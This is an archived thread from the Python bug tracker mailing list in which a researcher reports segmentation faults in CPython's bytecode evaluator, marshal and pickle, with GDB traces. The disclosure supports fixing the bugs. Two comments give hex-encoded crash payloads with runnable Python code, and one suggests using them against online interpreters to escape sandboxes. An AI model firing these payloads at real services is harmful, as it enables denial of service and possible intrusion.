[issue41168] Lack of proper checking in PyObject_SetAttr leads to segmentation fault
New submission from Iman Sharafodin : I was testing the latest release of Python 3.6 (June 27, 2020) (https://www.python.org/ftp/python/3.6.11/Python-3.6.11.tgz) and I found that there is lack of enough checks on line number 956 in Objects/object.c file which can cause a segmentation fault. It could lead to security related issues. I've attached the PoC.pyc. Program received signal SIGSEGV, Segmentation fault. PyObject_SetAttr (v=v@entry=0x6d7373616c637463, name=0x77f75730, value=value@entry=0x0) at Objects/object.c:956 956 PyTypeObject *tp = Py_TYPE(v); -- components: Interpreter Core files: PoC.pyc messages: 372683 nosy: Iman Sharafodin priority: normal severity: normal status: open title: Lack of proper checking in PyObject_SetAttr leads to segmentation fault type: security versions: Python 3.6 Added file: https://bugs.python.org/file49280/PoC.pyc ___ Python tracker <https://bugs.python.org/issue41168> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
New submission from Iman Sharafodin : Python 3.6 (June 27, 2020) (https://www.python.org/ftp/python/3.6.11/Python-3.6.11.tgz). I found an exploitable segmentation fault in Python 3.6.11 (I validated that by using GDB's Exploitable plugin). Please find the attachment. #0 0x00b63bf4 in _PyEval_EvalFrameDefault (f=, throwflag=) at Python/ceval.c:3667 #1 0x00b5bc5b in PyEval_EvalFrameEx (throwflag=0, f=0x77f66c50) at Python/ceval.c:754 #2 _PyEval_EvalCodeWithName (_co=_co@entry=0x77ef5030, globals=globals@entry=0x77f62168, locals=locals@entry=0x77f62168, args=args@entry=0x0, argcount=argcount@entry=0, kwnames=kwnames@entry=0x0, kwargs=0x0, kwcount=0, kwstep=2, defs=0x0, defcount=0, kwdefs=0x0, closure=0x0, name=0x0, qualname=0x0) at Python/ceval.c:4166 #3 0x00b6100b in PyEval_EvalCodeEx (closure=0x0, kwdefs=0x0, defcount=0, defs=0x0, kwcount=0, kws=0x0, argcount=0, args=0x0, locals=locals@entry=0x77f62168, globals=globals@entry=0x77f62168, _co=_co@entry=0x77ef5030) at Python/ceval.c:4187 #4 PyEval_EvalCode (co=co@entry=0x77ef5030, globals=globals@entry=0x77f62168, locals=locals@entry=0x77f62168) at Python/ceval.c:731 -- files: ExploitableCrash.pyc messages: 372776 nosy: Iman Sharafodin priority: normal severity: normal status: open title: An exploitable segmentation fault in _PyEval_EvalFrameDefault versions: Python 3.6 Added file: https://bugs.python.org/file49285/ExploitableCrash.pyc ___ Python tracker <https://bugs.python.org/issue41189> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment: I created a Python file with 12 lines of code and then changed the bytecode to make Python crash (I was testing Python to find security related bugs). I can send the original file, do you need that? -- ___ Python tracker <https://bugs.python.org/issue41189> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment: It could be potential dangerous, for example some services might use Python Core to decompile pyc files and they could be hacked or some other services could run restricted pyc files for users but using this bug they can escape the sandbox and run the malicious code. -- ___ Python tracker <https://bugs.python.org/issue41189> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment: You're right. But if someone uses the exact same code to decompile a pyc to a Python code, attacker doesn't have access to the interpreter and cannot even run the pyc file on the server, but the attacker can cause a crash and run the malicious exploit code. Anyway, my only goal was to help Python community (which I love it) to improve the code quality. Have a nice day. -- ___ Python tracker <https://bugs.python.org/issue41189> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41189] An exploitable segmentation fault in _PyEval_EvalFrameDefault
Iman Sharafodin added the comment: Thank you for the response. -- ___ Python tracker <https://bugs.python.org/issue41189> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
New submission from Iman Sharafodin : It seems that all versions of Python 3 are vulnerable to de-marshaling the attached file (Python file is included). I've tested on Python 3.10.0a0 (heads/master:b40e434, Jul 4 2020), Python 3.6.11 and Python 3.7.2. This is due to lack of proper validation at Objects/tupleobject.c:413 (heads/master:b40e434). This is the result of GDB's Exploitable plugin (it's exploitable): Description: Access violation during branch instruction Short description: BranchAv (4/22) Hash: e04b830dfb409a8bbf67bff96ff0df44.4d31b48b56e0c02ed51520182d91a457 Exploitability Classification: EXPLOITABLE Explanation: The target crashed on a branch instruction, which may indicate that the control flow is tainted. Other tags: AccessViolation (21/22) -- components: Interpreter Core files: Crash.zip messages: 372990 nosy: Iman Sharafodin priority: normal severity: normal status: open title: An exploitable segmentation fault in marshal module type: security versions: Python 3.10 Added file: https://bugs.python.org/file49295/Crash.zip ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: What about patching that as a crash? -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: By using our proprietary fuzzer. I'm a cybersecurity researcher. -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: I thought it's like Pickle. Then if we find an exploitable segfault just in Pickle, you would count it as a threat? -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: It's interesting that you would not count a critical segfault in Pickle as a threat, because there are numerous libraries that are Unpickling untrusted user data (even-though some of them are using RestrictedUnpickler to protect themselves but a segfault would bypass that). For example, Ray Project with five thousands commits (https://github.com/ray-project/ray/blob/master/rllib/utils/policy_server.py#L31). Long story short, you advise us to not put time on checking the security of the Pickle module too, am I right? Thanks, Iman -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: Sure. Thank you. -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: Nevertheless, I have an exploitable crash for the Pickle module too right now, but as you're not interested, I didn't open an issue to share it. Thanks anyway. -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:
There are many online Python interpreters, we can use this malicious file to
escape their sandboxes and get control of their Docker container or system (and
abuse them, for example, to conduct a DoS attack), as their fully trust that
Python doesn't generate segfault.
For example, the following code clearly kills the interpreter (and a shellcode
can be attached), even though, they have protection mechanisms for file access
and many other things.
---
https://www.programiz.com/python-programming/online-compiler/
---
import io
import marshal
hex_string =
"FBE90100DA0136E90209720100720300DA0168A903720100720500DA026161DA026A6A7BDA0278785B0200720100DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
---
--
___
Python tracker
<https://bugs.python.org/issue41208>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment:
@serhiy.storchaka you name it, you have it. The following code generates a
segfault on the Pickle module [it's a crafted datetime object] (Python 3.10.0a0
(heads/master:b40e434, Jul 4 2020), Python 3.6.11 and Python 3.7.2):
import io
import pickle
hex_string =
"8004952A008C086461746574696D65948C086461746574696D65949388430A07B2010192059452942E"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = pickle.load(f)
print(data)
print('We have segfault but we cannot see!')
--
___
Python tracker
<https://bugs.python.org/issue41208>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41288] Pickle crashes using a crafted datetime object
New submission from Iman Sharafodin :
The following code generates a segfault on the Pickle module [it's a crafted
datetime object] (Python 3.10.0a0 (heads/master:b40e434, Jul 4 2020), Python
3.6.11 and Python 3.7.2):
import io
import pickle
hex_string =
"8004952A008C086461746574696D65948C086461746574696D65949388430A07B2010192059452942E"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = pickle.load(f)
print(data)
print('We have segfault but we cannot see!')
--
components: Interpreter Core
messages: 373573
nosy: Iman Sharafodin
priority: normal
severity: normal
status: open
title: Pickle crashes using a crafted datetime object
type: crash
versions: Python 3.10
___
Python tracker
<https://bugs.python.org/issue41288>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin added the comment: @serhiy.storchaka Thank you. Please find it here https://bugs.python.org/issue41288 . -- ___ Python tracker <https://bugs.python.org/issue41208> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
